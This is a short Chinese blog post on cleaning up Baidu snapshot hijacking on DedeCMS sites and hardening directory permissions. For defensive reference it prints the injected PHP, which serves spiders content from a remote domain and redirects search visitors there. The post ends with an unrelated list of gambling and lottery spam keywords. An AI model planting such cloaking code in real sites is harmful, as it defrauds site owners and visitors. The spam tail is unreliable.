dedecms百度快照被劫持如何解決

2018-11-24 14:13:11 濟南網站建設
dedecms百度快照劫持注入代碼防范及修正,很多站長做站的過程中,濟南網站建設都碰過百度快照被劫持等問題,明明已經修復模板文件了,還是沒有更新回正常的快照,以dedecms程序為例,
 
往往根目錄/index.php也被植入惡意代碼
 
比如:
<?php
if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>
 
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網址去。
 
把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
 
關于防范,空間,ftp賬號,權限,后臺賬號之類都需要設置下,不能太過簡單,
 
 如果有服務器或者VPS權限,將data、templets、uploads、a或html目錄, 設置可讀寫,不可執行的權限,
 
        include、member、plus、后臺管理目錄 設置為可執行腳本,可讀,但不可寫入(安裝了附加模塊的,book、ask、company、group 目錄同樣如此設置)。
(*^▽^*)MG海豚海岸游戏网站 六彩开奖结果直播现场 卡五星一元群 哈灵浙江麻将游戏下载 七乐彩游戏玩法及规则 南京麻将什么玩法 海南琼崖麻将旧版本 老k街机捕鱼 云南11选5专家杀号 福彩江西快3开奖结果 黑龙江快乐十分计划软件下载 真人电子app平台下载 未来陕西麻将官方客服电话 欢乐捕鱼人的话费怎么用 秒速时时彩稳赢技巧 北京快三基本走势图 深圳福彩中福在线